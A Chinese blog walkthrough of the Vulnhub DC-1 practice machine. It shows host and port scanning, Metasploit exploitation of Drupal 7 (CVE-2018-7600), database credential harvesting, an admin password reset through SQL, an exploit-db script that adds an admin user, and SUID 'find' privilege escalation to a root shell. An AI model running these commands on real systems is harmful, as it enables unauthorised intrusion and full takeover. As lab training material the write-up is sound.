Vulnhub靶机——DC-1

最新推荐文章于 2024-07-28 23:19:17 发布
最新推荐文章于 2024-07-28 23:19:17 发布
阅读量893 收藏 10
点赞数 22
分类专栏: Vulnhub 文章标签: 安全 web安全 系统安全 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/W13680336969/article/details/137935938
版权

靶机地址

https://www.vulnhub.com/entry/dc-1,292/

知识点

  1. drupal7框架漏洞CVE-2018-7600

  2. msf的框架模块利用getshell

  3. SUID-find提权

思路总结

  1. 信息收集(http端口,源码是否有信息泄露,CMS框架是否存在框架漏洞)

  2. msf利用框架漏洞获取普通用户shell

  3. Drupal7的用户密码重置成功进入web端后台(尝试中间件漏洞提权)

  4. SUID提权(终端提权)

渗透流程

一、主机发现

1.攻击机

#ip
192.168.186.135

2.靶机

Nmap扫描

nmap -sP 192.168.186.0/24
192.168.186.158

ARP扫描

arp-scan -l    #探测同一区域中存活主机

二、端口扫描

nmap强扫描

nmap -A -sV -T4 -p- 192.168.186.158

三、实施攻击

1.HTTP端口信息收集

(1)80端口源码查看

(2)无敏感信息,有CMS(内容管理系统)版本

(3)robots协议查看

2.漏洞利用

(1)CMS版本为drupal 7,搜索查看是否存在CMS框架漏洞

(2)存在CMS漏洞,进入msf进行cms漏洞模块利用

msfconsole    #进入msf控制台

(3)搜索drupal模块

search drupal        #搜索对应模块

(4)使用漏洞模块

use         #对应模块

(4)设置模块使用的对象,并且运行脚本(如图则成功利用脚本连接上靶机)

set rhosts 192.168.186.158        #设置模块应用的主机IP(存在漏洞的靶机)
run                               #运行模块脚本

3.获取shell

shell    #获得shell
python -c 'import pty;pty.spawn("/bin/bash")'    #美化shell

(1)基本信息收集

whoami        #查看当前用户
pwd           #查看当前所在路径     
ls            #查看当前目录下文件

(2)拿到提示信息(配置文件)

(3)搜索Drupal系统的默认配置文件信息

(4)find命令找出配置文件所在位置

find / -name 文件名    #在根目录下根据文件名进行查找
find / -name default.settings.php

(5)查看配置信息(得到数据库信息)

(6)进入数据库

mysql -u 数据库名 -p
mysql -u dbuser -p

(7)数据库信息收集

show databases;    #列出数据库
use drupaldb;      #进入drupaldb数据库
show tables;       #列出数据库中所有的表

(8)查看数据库用户表(发现管理员用户,但是密码是加密的)

select *from users    #列出users表中的信息

4.信息利用

(1)知道管理员用户的存在,如果能修改管理员用户密码,就能进入后台,查询一下是否存在默认重置密码功能

(2)官方提供两种解决办法,注册新的管理员用户或者修改密码

方法一

(1)msf查询下针对drupal框架攻击的脚本

searchsploit drupal    #发现可以利用脚本增加admin用户

(2)查看下靶机的drupal版本

cat /var/www/includes/bootstrap.inc | grep VERSION

(3)版本满足条件,可以使用增加admin用户的脚本,

searchsploit 34992.py -p #查看脚本的路径

(4)访问HTTP路径,下载脚本修改或者通过命令直接修改

python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.186.158 -u admin1 -p 666    #python3环境可能会报错

方法二

(1)找到系统默认的加密scripts脚本,

find / -name scripts    #drupal默认hash加密脚本是在drupal7项目所在目录,所以是在网站的根目录下

(2)得到新密码的hash值

php scripts/password-hash.sh 新密码
php scripts/password-hash.sh 666

(3)回到数据库,重置管理员密码

update drupaldb.users set pass="$S$DGbrDoNc82wkOtVKRZ/oWQ7tJN1Et5GaqpZ4N5BDzaWzihbT7VGB" where name="admin";

(4)以管理员身份登录后台

(5)翻找历史记录

/etc/passwd    #一个文本文件,存储用户账号信息,用户ID,组ID,shell等
/etc/shadow    #是/etc/passwd的影子文件,存有密码信息,通常需要root权限才能访问

(6)查看/etc/passwd文件(发现flag4在/home/flag4目录下)

(7)拿到flag4的提示,最后一个flag在root目录中

5.提权

一、web端提权

(1)wappalyzor抓取指纹信息

(2)查询是否存在中间件漏洞(并不存在)

二、终端提权

SUID-find提权

(1)查找具备SUID权限的可执行文件,并且文件拥有者为root

#不同系统对应命令不同,都试一下
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb{}
#常见的可以利用SUID提权的文件
nmap
vim
find
bash
more
less
nanocp
awk

(2)有find文件,再次确认find文件的文件拥有者(属主)

ls -l /usr/bin/find

(3)find命令直接提权

find / -exec '/bin/sh' \;

Yeah_0day
关注
专栏目录
vulnhubDC-1
BurYiA的博客
05-02 634
文章目录vulnhubDC-1准备工作1.主机查找2.信息搜集3.正文方法一方法二 vulnhubDC-1 大神们可以退场了,小白的第一篇文章,可能会有很多错误,很多地方可能也会说不清楚。望见谅。 前段时间了解到这个平台,然后就开始难受了,真心不会做(就是太菜了)。闲话就不多说了,开始吧 准备工作 1.DC-1虚拟机(可能得搭梯子,自行尝试) 2.kali虚拟机 1.主机查找 这个就是基本操作...
VulnHubDC-1
weixin_39219503的博客
01-29 256
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-1,292/ 题目信息如下,环境中有flag文件,里面有hint DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. ...
vulnhub靶机
weixin_43902100的博客
09-28 295
vulnhub靶场:ME AND MY GIRLFRIEND: 1 靶机下载地址:http://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 实验环境:VMware,kali虚拟机 实战WP 寻找靶机ip,arp-scan -l,发现靶机IP为192.168.46.131(如果得不到靶机的地址,可能是因为靶机的网卡信息不对参考:https://blog.csdn.net/asstart/article/details/103433065) nmap扫描
VulnHub靶机入门篇--Kioptrix4
最新发布
2302_78903258的博客
07-28 1094
前面的知识点都跟之前题目差不多,后面出现了sql注入的利用,sqlmap工具的使用,以及获得webshell,在获得webshell之后的提权(数据库提权),以及一些linux的常用命令。
Vulnhub靶机
weixin_43902100的博客
09-21 675
Vulnhub靶机渗透测试实战(一):CHERRY: 1 下载地址:http://www.vulnhub.com/entry/cherry-1,552/ 实验环境:VMware,kali虚拟机 将下载好的镜像文件导入VMware 局域网内扫描主机 arp-scan -l 一般情况最大最小的不会是靶机的IP,所以靶机的IP为:192.168.46.130 nmap扫描主机,查看开启了那些端口 nmap -sV -p- 192.168.46.130 发现开放了80,7755两个端口,进行访问,发现两个
Vulnhub-DC-1
T1me
10-25 474
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2512
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机实战——DC-3
冠霖L的博客
09-27 9108
靶机DC-3下载地址:https://download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https://download.vulnhub.com/dc/DC-3VMware.zip 注:开始将DC-3.ova文件导入VMware虚拟机,发现无法获取靶机IP地址,作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware,然...
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 4803
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
Vulnhub靶机实战——DC-1
冠霖L的博客
09-27 1984
靶机DC-1下载地址:https://download.vulnhub.com/dc/DC-1.zip 描述:靶机DC-1共有5个flag,并且需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.130 Kali的IP地址:192.168.220.131 本...
Vulnhub靶机实战——DC-7
冠霖L的博客
10-29 5000
靶机DC-7下载地址:https://download.vulnhub.com/dc/DC-7.zip 环境:VMware 15虚拟机软件 DC-7靶机IP地址:192.168.220.154 Kali的IP地址:192.168.220.155 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155...
vulnhub DC-1
底层社会中的弱智
08-27 187
新安装的扫描器 droopescan 找到目标靶机IP 扫描全端口 可以看到80端口的CMS采用的Drupal 7 ,使用新安装的扫描器进行扫描 也可以使用whatweb命令查看CMS 扫描器 进入MSF所搜可以使用漏洞利用模块 利用模块设置模块参数 开始提权 提权 ...
VulnHub靶机-SkyTower
Slow_的博客
02-26 759
VulnHub靶机-SkyTower 下载地址:https://www.vulnhub.com/entry/skytower-1,96/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 环境: 攻击机和靶机均在192.168.8.0段 攻击机:kali linux 192.168.8.108 文章目录VulnHub靶机-SkyTower一、信息搜集二、提权 一、信息搜集 要想渗透靶机,首先得知道靶机的IP是什么,我们先用nmap探测存活主机。 命令:nmap -sP 19
VulnHub DC-1
weixin_45682839的博客
04-13 359
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
Vulnhub 靶机DC-1
Lee_yc的博客
08-18 266
扫描局域网中的IP地址,确定靶机ip arp-scan -l
Vulnhub靶机-PumpkinFestival
ergeLXT的博客
06-28 659
需要修改本地hosts文件之后进行访问,添加pumpkins.local到hosts文件之后访问。使用 echo 命令创建一个名为alohomora的文件,其中复制了/bin/bash。本机尝试,在本机ftp登录靶机,拿到data,解压,解密到key(2)文件,然后ssh登录。登录名为admin的wp-admin用户,在得到令牌二的时候获取到一个关键字。在上面的目录中除token.txt之外,还有一个NOOOOO目录,继续访问。有一个NO目录,继续访问,经过多次遍历,找到token.txt。
Vulnhub靶机 Lin.security
菜浪马废的博客
04-27 260
给了登录账号 直接拿靶机登录 第一种方法 第二种方法
Vulnhub靶机 FourAndSix2
菜浪马废的博客
09-16 166
目标靶机ip:192.168.80.139 开放nfs 有一个压缩文件 里面有id-rsa 但是加密了 得到密码:chocolate 用户名:user 还有一层验证 cat /usr/share/wordlists/rockyou.txt | while read pass; do if ssh-keygen -c -C “user@forandsix” -P $pass -f id_rsa &>/dev/null; then echo $pass; break; fi; d.
vulnhub靶机——raven: 2
09-03
- *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值